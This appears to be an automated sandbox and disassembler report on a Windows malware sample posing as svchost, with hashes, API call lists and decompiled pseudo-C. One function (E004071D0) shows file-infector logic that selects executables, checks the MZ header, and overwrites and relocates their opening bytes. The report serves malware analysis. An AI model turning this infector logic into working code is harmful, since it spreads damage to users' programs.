                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                          • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                                          • Opcode Fuzzy Hash: 47f9ec76bd499baa866f378b061b69eb1c32c010a676678d587083082739568e
                                                                          • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406638, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 406638-406663 1 406665 0->1 2 406668-40667f call 40598c 0->2 1->2 5 406685-4066c7 call 40456c call 405fd8 * 2 2->5 6 406b1c-406b25 2->6 13 406877-40687e 5->13 14 4066cd-4066d4 5->14 15 406884-406892 13->15 16 406aeb-406b10 call 404520 * 3 13->16 17 4066d7-4066e7 14->17 18 406895-4068a5 15->18 19 4066f3-406713 GetObjectA 17->19 20 4066e9-4066ed 17->20 22 4068b1-4068ed GetObjectA call 402660 18->22 23 4068a7-4068ab 18->23 25 406724-40673d call 402660 19->25 26 406715-40671f GetObjectA 19->26 20->13 20->19 35 4068f6-406912 call 40465c 22->35 36 4068ef-4068f3 22->36 23->16 23->22 33 406748-40675c CopyImage call 4061e0 25->33 34 40673f-406743 25->34 26->25 43 406761-406796 call 402660 call 406154 GetObjectA 33->43 38 406801-406858 call 4045e8 call 4065cc call 406598 call 406624 call 40598c 34->38 48 406923-40695c call 4065cc call 406624 call 40598c 35->48 49 406914-40691f call 406580 35->49 36->35 87 406864-406871 38->87 88 40685a-40685f call 402bec 38->88 62 4067b1-4067c5 43->62 63 406798-40679d 43->63 77 406968-40696a 48->77 78 40695e-406963 call 402bec 48->78 49->48 67 4067d7-4067dd 62->67 68 4067c7-4067d5 call 406218 62->68 63->62 66 40679f-4067af 63->66 66->38 73 4067ef-4067fd call 406218 67->73 74 4067df-4067ed call 406218 67->74 68->38 73->38 74->38 84 406970-40698d CopyImage call 4061e0 77->84 85 4069f4-406a12 CopyImage call 4061e0 call 406218 77->85 78->6 95 4069a0-4069a3 84->95 96 40698f 84->96 103 406a17-406a1e 85->103 87->13 87->17 88->6 101 4069a5-4069a8 95->101 102 4069dc-4069e6 call 406218 95->102 99 4069d0-4069da call 406218 96->99 100 406991-406992 96->100 99->103 105 406994-406997 100->105 106 4069ac-4069b6 call 406218 100->106 108 4069e8-4069f2 call 406218 101->108 109 4069aa 101->109 102->103 110 406a20-406a47 call 40598c 103->110 111 406a89-406ad2 CopyImage call 4061e0 call 406218 call 406624 call 40598c call 406624 103->111 115 4069b8-4069c2 call 406218 105->115 116 406999-40699c 105->116 106->103 108->103 109->103 127 406a53-406a7d call 4065cc call 40598c call 4065cc 110->127 128 406a49-406a4e call 402bec 110->128 149 406ad4-406ad9 call 402bec 111->149 150 406adb-406ae5 111->150 115->103 122 4069c4-4069ce call 406218 116->122 123 40699e 116->123 122->103 123->103 127->111 148 406a7f-406a84 call 402bec 127->148 128->6 148->6 149->6 150->16 150->18
                                                                          C-Code - Quality: 78%
                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v14;
				char _v17;
				signed int _v18;
				char _v19;
				int _v20;
				void** _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v33;
				int _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed short _v58;
				short _v60;
				short _v62;
				intOrPtr _v68;
				void* _v72;
				void** _v76;
				void** _v80;
				intOrPtr _v100;
				signed short _v106;
				short _v108;
				int _v112;
				int _v116;
				char _v120;
				short _v126;
				intOrPtr _v128;
				int _v136;
				int _v140;
				void _v144;
				void* __ebp;
				signed int _t138;
				signed int _t139;
				void* _t141;
				unsigned int _t152;
				void* _t154;
				void* _t162;
				void* _t179;
				void* _t181;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t212;
				void* _t214;
				signed int _t220;
				void* _t221;
				void* _t229;
				void* _t232;
				void* _t243;
				void* _t255;
				intOrPtr _t264;
				void* _t274;
				void* _t275;
				int _t293;
				int _t294;
				intOrPtr _t318;
				void* _t324;
				void* _t366;
				void* _t369;
				int _t375;
				int _t376;
				void* _t378;
				void* _t380;
				intOrPtr _t381;

				_t378 = _t380;
				_t381 = _t380 + 0xffffff74;
				_v32 = __ecx;
				_v28 = __edx;
				_v24 = __eax;
				_v33 = 0;
				_v62 = 0;
				_v60 = 1;
				_t138 = _v28 + 1;
				_t139 = _t138 >> 1;
				if(_t138 < 0) {
					asm("adc eax, 0x0");
				}
				_v58 = _t139;
				_t141 = E0040598C(_v32);
				_t384 = _t141 - 6;
				if(_t141 != 6) {
					L59:
					return _v33;
				} else {
					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
					_v68 = E0040456C();
					_v52 = E00405FD8(0, 0, _t384);
					_v56 = E00405FD8(0, 0, _t384);
					_push(_t378);
					_push(0x406b11);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t381;
					_t152 = _v28 >> 1;
					if(_t152 < 0) {
						L22:
						_t154 = _v28 >> 1;
						__eflags = _t154;
						if(_t154 < 0) {
							L57:
							__eflags = 0;
							_pop(_t318);
							 *[fs:eax] = _t318;
							_push(E00406B18);
							E00404520(_v68);
							E00404520(_v52);
							return E00404520(_v56);
						} else {
							_t162 = _t154 + 1;
							__eflags = _t162;
							_v72 = _t162;
							_v40 = 0;
							_v80 = _v24;
							do {
								_t366 =  *_v80;
								_v48 = _v80[1];
								__eflags = _t366;
								if(_t366 != 0) {
									L26:
									GetObjectA(_v48, 0x18,  &_v144);
									_t293 = _v140;
									_t375 = _v136;
									E00402660( &_v120, 0x28);
									_v120 = 0x28;
									_v116 = _t293;
									_v112 = _t375;
									__eflags = _t366;
									if(_t366 != 0) {
										_t243 = _t293 + _t293;
										__eflags = _t243;
										_v112 = _t243;
									}
									_v108 = 1;
									_v18 = E0040465C(_v68, _v40);
									__eflags = _v14;
									if(_v14 == 0) {
										_v14 = E00406580(_v18 & 0x0000ffff);
									}
									_v106 = _v14;
									_push(E004065CC(_t293, _t375, _t378) + 0x28);
									_t179 = E00406624(_t293, _t375);
									_pop(_t324);
									_v100 = _t324 + _t179;
									_t181 = E0040598C(_v32);
									__eflags = _t181 - 0x28;
									if(_t181 == 0x28) {
										__eflags = _t366;
										if(__eflags == 0) {
											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v52, 0x28, 1, _t378, __eflags);
										} else {
											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
											_t220 = _v106 & 0x0000ffff;
											__eflags = _t220 - 0x10;
											if(__eflags > 0) {
												_t221 = _t220 - 0x18;
												__eflags = _t221;
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 6, _t378, __eflags);
												} else {
													__eflags = _t221 - 8;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 7, _t378, __eflags);
													}
												}
											} else {
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 5, _t378, __eflags);
												} else {
													_t229 = _t220 - 1;
													__eflags = _t229;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 1, _t378, __eflags);
													} else {
														_t232 = _t229 - 3;
														__eflags = _t232;
														if(__eflags == 0) {
															E00406218(_v52, 0x28, 2, _t378, __eflags);
														} else {
															__eflags = _t232 - 4;
															if(__eflags == 0) {
																E00406218(_v52, 0x28, 3, _t378, __eflags);
															}
														}
													}
												}
											}
										}
										__eflags =  *(_v52 + 0x41);
										if(__eflags == 0) {
											L54:
											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v56, 0x28, 1, _t378, __eflags);
											E00406624(_t293, _t375);
											_t199 = E0040598C(_v32);
											_t201 = E00406624(_t293, _t375);
											__eflags = _t199 - _t201;
											if(_t199 == _t201) {
												goto L56;
											} else {
												E00402BEC();
												goto L59;
											}
										} else {
											_t207 = E0040598C(_v32);
											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
											if(_t207 == (_v18 & 0x0000ffff) << 2) {
												E004065CC(_t293, _t375, _t378);
												_t212 = E0040598C(_v32);
												_t214 = E004065CC(_t293, _t375, _t378);
												_pop(0x28);
												__eflags = _t212 - _t214;
												if(__eflags == 0) {
													goto L54;
												} else {
													E00402BEC();
													goto L59;
												}
											} else {
												E00402BEC();
												goto L59;
											}
										}
									} else {
										E00402BEC();
										goto L59;
									}
								} else {
									__eflags = _v48;
									if(_v48 == 0) {
										goto L57;
									} else {
										goto L26;
									}
								}
								goto L60;
								L56:
								_v40 = _v40 + 1;
								_v80 =  &(_v80[2]);
								_t130 =  &_v72;
								 *_t130 = _v72 - 1;
								__eflags =  *_t130;
							} while ( *_t130 != 0);
							goto L57;
						}
					} else {
						_v72 = _t152 + 1;
						_v76 = _v24;
						while(1) {
							_t369 =  *_v76;
							_v48 = _v76[1];
							if(_t369 == 0 && _v48 == 0) {
								goto L22;
							}
							GetObjectA(_v48, 0x18,  &_v144);
							_t294 = _v140;
							_t376 = _v136;
							if(_t369 != 0) {
								GetObjectA(_t369, 0x18,  &_v144);
							}
							E00402660( &_v20, 0x10);
							_v20 = _t294;
							_v19 = _t376;
							if(_t369 != 0) {
								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
								E004061E0(_v52, _t255, __eflags);
								E00402660( &_v120, 0x28);
								_v120 = 0x28;
								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
								_t264 = _v128;
								__eflags = _t264 - 1;
								if(_t264 != 1) {
									L14:
									_t310 = _v126;
									__eflags = 1 - 0x10;
									if(1 >= 0x10) {
										__eflags = 1 - 0x100;
										if(1 >= 0x100) {
											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
											_v18 = 0;
											_v17 = 1;
										} else {
											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
											_v18 = 0x10;
										}
									} else {
										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
										_v18 = 2;
									}
								} else {
									__eflags = _v126 - 0xf;
									if(_v126 < 0xf) {
										goto L14;
									} else {
										_v18 = 0;
										_v17 = 0;
										_v14 = _v126;
									}
								}
							} else {
								_v18 = 2;
							}
							E004045E8(_v68, 0xbadbad);
							_t274 = E004065CC(_t294, _t376, _t378);
							_t275 = E00406598(_t378);
							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
							_v8 = _v44;
							if(E0040598C(_v32) == 0x10) {
								_v44 = _v44 + _v12;
								_v76 =  &(_v76[2]);
								_t66 =  &_v72;
								 *_t66 = _v72 - 1;
								__eflags =  *_t66;
								if( *_t66 != 0) {
									continue;
								} else {
									goto L22;
								}
							} else {
								E00402BEC();
								goto L59;
							}
							goto L60;
						}
						goto L22;
					}
				}
				L60:
			}







































































                                                                          0x00406639
                                                                          0x0040663b
                                                                          0x00406644
                                                                          0x00406647
                                                                          0x0040664a
                                                                          0x0040664d
                                                                          0x00406651
                                                                          0x00406657
                                                                          0x00406660
                                                                          0x00406661
                                                                          0x00406663
                                                                          0x00406665
                                                                          0x00406665
                                                                          0x00406668
                                                                          0x00406677
                                                                          0x0040667c
                                                                          0x0040667f
                                                                          0x00406b1c
                                                                          0x00406b25
                                                                          0x00406685
                                                                          0x0040668f
                                                                          0x00406697
                                                                          0x004066a3
                                                                          0x004066af
                                                                          0x004066b4
                                                                          0x004066b5
                                                                          0x004066ba
                                                                          0x004066bd
                                                                          0x004066c3
                                                                          0x004066c7
                                                                          0x00406877
                                                                          0x0040687a
                                                                          0x0040687c
                                                                          0x0040687e
                                                                          0x00406aeb
                                                                          0x00406aeb
                                                                          0x00406aed
                                                                          0x00406af0
                                                                          0x00406af3
                                                                          0x00406afb
                                                                          0x00406b03
                                                                          0x00406b10
                                                                          0x00406884
                                                                          0x00406884
                                                                          0x00406884
                                                                          0x00406885
                                                                          0x00406888
                                                                          0x00406892
                                                                          0x00406895
                                                                          0x00406898
                                                                          0x004068a0
                                                                          0x004068a3
                                                                          0x004068a5
                                                                          0x004068b1
                                                                          0x004068be
                                                                          0x004068c3
                                                                          0x004068c9
                                                                          0x004068d9
                                                                          0x004068de
                                                                          0x004068e5
                                                                          0x004068e8
                                                                          0x004068eb
                                                                          0x004068ed
                                                                          0x004068f1
                                                                          0x004068f1
                                                                          0x004068f3
                                                                          0x004068f3
                                                                          0x004068f6
                                                                          0x0040690a
                                                                          0x0040690d
                                                                          0x00406912
                                                                          0x0040691f
                                                                          0x0040691f
                                                                          0x00406927
                                                                          0x00406939
                                                                          0x0040693e
                                                                          0x00406943
                                                                          0x00406946
                                                                          0x00406954
                                                                          0x00406959
                                                                          0x0040695c
                                                                          0x00406968
                                                                          0x0040696a
                                                                          0x00406a08
                                                                          0x00406a12
                                                                          0x00406970
                                                                          0x00406981
                                                                          0x00406986
                                                                          0x0040698a
                                                                          0x0040698d
                                                                          0x004069a0
                                                                          0x004069a0
                                                                          0x004069a3
                                                                          0x004069e1
                                                                          0x004069a5
                                                                          0x004069a5
                                                                          0x004069a8
                                                                          0x004069ed
                                                                          0x004069ed
                                                                          0x004069a8
                                                                          0x0040698f
                                                                          0x0040698f
                                                                          0x004069d5
                                                                          0x00406991
                                                                          0x00406991
                                                                          0x00406991
                                                                          0x00406992
                                                                          0x004069b1
                                                                          0x00406994
                                                                          0x00406994
                                                                          0x00406994
                                                                          0x00406997
                                                                          0x004069bd
                                                                          0x00406999
                                                                          0x00406999
                                                                          0x0040699c
                                                                          0x004069c9
                                                                          0x004069c9
                                                                          0x0040699c
                                                                          0x00406997
                                                                          0x00406992
                                                                          0x0040698f
                                                                          0x0040698d
                                                                          0x00406a1a
                                                                          0x00406a1e
                                                                          0x00406a89
                                                                          0x00406a9d
                                                                          0x00406aa7
                                                                          0x00406ab0
                                                                          0x00406ac0
                                                                          0x00406acb
                                                                          0x00406ad0
                                                                          0x00406ad2
                                                                          0x00000000
                                                                          0x00406ad4
                                                                          0x00406ad4
                                                                          0x00000000
                                                                          0x00406ad4
                                                                          0x00406a20
                                                                          0x00406a37
                                                                          0x00406a45
                                                                          0x00406a47
                                                                          0x00406a58
                                                                          0x00406a69
                                                                          0x00406a75
                                                                          0x00406a7a
                                                                          0x00406a7b
                                                                          0x00406a7d
                                                                          0x00000000
                                                                          0x00406a7f
                                                                          0x00406a7f
                                                                          0x00000000
                                                                          0x00406a7f
                                                                          0x00406a49
                                                                          0x00406a49
                                                                          0x00000000
                                                                          0x00406a49
                                                                          0x00406a47
                                                                          0x0040695e
                                                                          0x0040695e
                                                                          0x00000000
                                                                          0x0040695e
                                                                          0x004068a7
                                                                          0x004068a7
                                                                          0x004068ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004068ab
                                                                          0x00000000
                                                                          0x00406adb
                                                                          0x00406adb
                                                                          0x00406ade
                                                                          0x00406ae2
                                                                          0x00406ae2
                                                                          0x00406ae2
                                                                          0x00406ae2
                                                                          0x00000000
                                                                          0x00406895
                                                                          0x004066cd
                                                                          0x004066ce
                                                                          0x004066d4
                                                                          0x004066d7
                                                                          0x004066da
                                                                          0x004066e2
                                                                          0x004066e7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00406700
                                                                          0x00406705
                                                                          0x0040670b
                                                                          0x00406713
                                                                          0x0040671f
                                                                          0x0040671f
                                                                          0x0040672e
                                                                          0x00406733
                                                                          0x00406738
                                                                          0x0040673d
                                                                          0x00406752
                                                                          0x0040675c
                                                                          0x0040676b
                                                                          0x00406770
                                                                          0x00406789
                                                                          0x0040678e
                                                                          0x00406792
                                                                          0x00406796
                                                                          0x004067b1
                                                                          0x004067b1
                                                                          0x004067c2
                                                                          0x004067c5
                                                                          0x004067d7
                                                                          0x004067dd
                                                                          0x004067f4
                                                                          0x004067f9
                                                                          0x004067fd
                                                                          0x004067df
                                                                          0x004067e4
                                                                          0x004067e9
                                                                          0x004067e9
                                                                          0x004067c7
                                                                          0x004067cc
                                                                          0x004067d1
                                                                          0x004067d1
                                                                          0x00406798
                                                                          0x00406798
                                                                          0x0040679d
                                                                          0x00000000
                                                                          0x0040679f
                                                                          0x0040679f
                                                                          0x004067a3
                                                                          0x004067ab
                                                                          0x004067ab
                                                                          0x0040679d
                                                                          0x0040673f
                                                                          0x0040673f
                                                                          0x0040673f
                                                                          0x00406813
                                                                          0x0040681d
                                                                          0x00406826
                                                                          0x0040683c
                                                                          0x00406842
                                                                          0x00406858
                                                                          0x00406867
                                                                          0x0040686a
                                                                          0x0040686e
                                                                          0x0040686e
                                                                          0x0040686e
                                                                          0x00406871
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040685a
                                                                          0x0040685a
                                                                          0x00000000
                                                                          0x0040685a
                                                                          0x00000000
                                                                          0x00406858
                                                                          0x00000000
                                                                          0x004066d7
                                                                          0x004066c7
                                                                          0x00000000

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00000000), ref: 00406977
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 004069FE
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00406752
                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                            • Part of subcall function 00406154: 72E7AC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                            • Part of subcall function 00406154: 72E7A7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                            • Part of subcall function 00406154: 72E7B380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                          • CopyImage.USER32(?,00000000,?,?,00000000), ref: 00406A93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$CopyImage$B380
                                                                          • String ID: (
                                                                          • API String ID: 1117845954-3887548279
                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004071D0, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 83%
                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				char _v40254;
				char _v41487;
				char _v41488;
				char _v41492;
				char _v41496;
				char _v41500;
				char _v41504;
				void* _t45;
				void* _t80;
				void* _t82;
				long _t85;
				CHAR* _t130;
				intOrPtr _t150;
				void* _t154;
				void* _t155;
				long _t173;
				void* _t177;
				void* _t178;

				_t128 = __ebx;
				_t177 = _t178;
				_push(__eax);
				_t45 = 0xa;
				goto L1;
				L17:
				_pop(_t150);
				 *[fs:eax] = _t150;
				_push(E00407493);
				E004030B8( &_v41504, 4);
				return E00403094( &_v8);
				L1:
				_t178 = _t178 + 0xfffff004;
				_push(_t45);
				_t45 = _t45 - 1;
				_t180 = _t45;
				if(_t45 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_v41504 = 0;
					_v41500 = 0;
					_v41496 = 0;
					_v41492 = 0;
					E004033FC(_v8);
					_push(_t177);
					_push(0x40748c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t178 + 0xfffffde8;
					_v9 = 0;
					E004031F4( &_v41492, 3, 0x4091c0);
					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
						E00404F34(_v8,  &_v41496);
						E0040312C( &_v8, _v41496);
						E00404F90( &_v41500, _t128, 3);
						_push(E0040340C(_v41500));
						_t129 = E0040340C(_v8);
						_pop(_t154);
						if(E00404B38(_t68, _t154) == 0) {
							E00405008( &_v41504, _t129, 3);
							_t155 = E0040340C(_v41504);
							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
								_t80 = E00404F6C(_v8);
								if(_t80 > 0xa200 && _t80 <= 0x989680) {
									_t82 = E00407130(_v8, _t129); // executed
									if(_t82 == 0) {
										_v9 = 1;
										_t130 = E0040340C(_v8);
										_t85 = GetFileAttributesA(_t130); // executed
										_t173 = _t85;
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(_t130, 0);
										}
										_t131 = E00405BDC();
										_t175 = E004064CC();
										E00406CA8(_t87, 0, _v8);
										E00406510(_t175, _t86);
										E00405974();
										E00404198();
										E00405988(_t131);
										E00404520(_t131);
										E00404520(_t175);
										_t132 = E00404B68(_v8, 0xc0000303);
										if(_t103 != 0xffffffff) {
											E00404BC4(_t132, 2,  &_v41488);
											if(_v41488 == 0x4d && _v41487 == 0x5a) {
												E00404BB4(_t132, 0, 0);
												E00404BC4(_t132, 0xa200,  &_v41488);
												E0040254C( &_v40254, 4,  &_v16);
												E00407080( &_v41488, _v16, 0x3e8);
												E00404BB4(_t132, 0, 0);
												E00404BE0(_t132, 0xa200, 0x40a698);
												E00404BB4(_t132, 2, 0);
												E00404BE0(_t132, 0xa200,  &_v41488);
											}
										}
										E00404B90(_t132);
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(E0040340C(_v8), _t173);
										}
									}
								}
							}
						}
					}
					goto L17;
				}
			}
























                                                                          0x004071d0
                                                                          0x004071d1
                                                                          0x004071d3
                                                                          0x004071d4
                                                                          0x004071d4
                                                                          0x00407466
                                                                          0x00407468
                                                                          0x0040746b
                                                                          0x0040746e
                                                                          0x0040747e
                                                                          0x0040748b
                                                                          0x004071d9
                                                                          0x004071d9
                                                                          0x004071df
                                                                          0x004071e0
                                                                          0x004071e0
                                                                          0x004071e1
                                                                          0x00000000
                                                                          0x004071e3
                                                                          0x004071ec
                                                                          0x004071f1
                                                                          0x004071f7
                                                                          0x004071fd
                                                                          0x00407203
                                                                          0x0040720f
                                                                          0x00407216
                                                                          0x00407217
                                                                          0x0040721c
                                                                          0x0040721f
                                                                          0x00407222
                                                                          0x00407236
                                                                          0x0040724b
                                                                          0x0040725a
                                                                          0x00407268
                                                                          0x00407273
                                                                          0x00407283
                                                                          0x0040728c
                                                                          0x00407290
                                                                          0x00407298
                                                                          0x004072a4
                                                                          0x004072b7
                                                                          0x004072bf
                                                                          0x004072de
                                                                          0x004072e8
                                                                          0x004072fc
                                                                          0x00407303
                                                                          0x00407309
                                                                          0x00407315
                                                                          0x00407318
                                                                          0x0040731d
                                                                          0x00407325
                                                                          0x0040732a
                                                                          0x0040732a
                                                                          0x00407334
                                                                          0x0040733b
                                                                          0x00407344
                                                                          0x0040734d
                                                                          0x00407359
                                                                          0x00407368
                                                                          0x00407379
                                                                          0x00407380
                                                                          0x00407387
                                                                          0x00407399
                                                                          0x0040739e
                                                                          0x004073b1
                                                                          0x004073bd
                                                                          0x004073d2
                                                                          0x004073e4
                                                                          0x004073f7
                                                                          0x0040740a
                                                                          0x00407415
                                                                          0x00407426
                                                                          0x00407431
                                                                          0x00407443
                                                                          0x00407443
                                                                          0x004073bd
                                                                          0x0040744a
                                                                          0x00407455
                                                                          0x00407461
                                                                          0x00407461
                                                                          0x00407455
                                                                          0x00407303
                                                                          0x004072e8
                                                                          0x004072bf
                                                                          0x00407298
                                                                          0x00000000
                                                                          0x0040724b

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                          • API String ID: 997383822-4093836345
                                                                          • Opcode ID: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                          • Opcode Fuzzy Hash: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401788, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 251 401788-4017aa RtlInitializeCriticalSection 252 4017b6-4017ec call 40114c * 3 LocalAlloc 251->252 253 4017ac-4017b1 RtlEnterCriticalSection 251->253 260 40181d-401831 252->260 261 4017ee 252->261 253->252 264 401833-401838 RtlLeaveCriticalSection 260->264 265 40183d 260->265 262 4017f3-401805 261->262 262->262 266 401807-401816 262->266 264->265 266->260
                                                                          C-Code - Quality: 68%
                                                                          			E00401788() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E0040183E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40a5b4);
				L004010DC();
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010E4();
				}
				E0040114C(0x40a5d4);
				E0040114C(0x40a5e4);
				E0040114C(0x40a610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x40a60c = _t11;
				if( *0x40a60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40a60c; // 0x570960
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
					 *0x40a5f4 = 0x40a5f4;
					 *0x40a600 = 0x40a5f4;
					 *0x40a5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x401845);
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010EC();
					return 0;
				}
				return 0;
			}








                                                                          0x0040178d
                                                                          0x0040178e
                                                                          0x00401793
                                                                          0x00401796
                                                                          0x00401799
                                                                          0x0040179e
                                                                          0x004017aa
                                                                          0x004017ac
                                                                          0x004017b1
                                                                          0x004017b1
                                                                          0x004017bb
                                                                          0x004017c5
                                                                          0x004017cf
                                                                          0x004017db
                                                                          0x004017e0
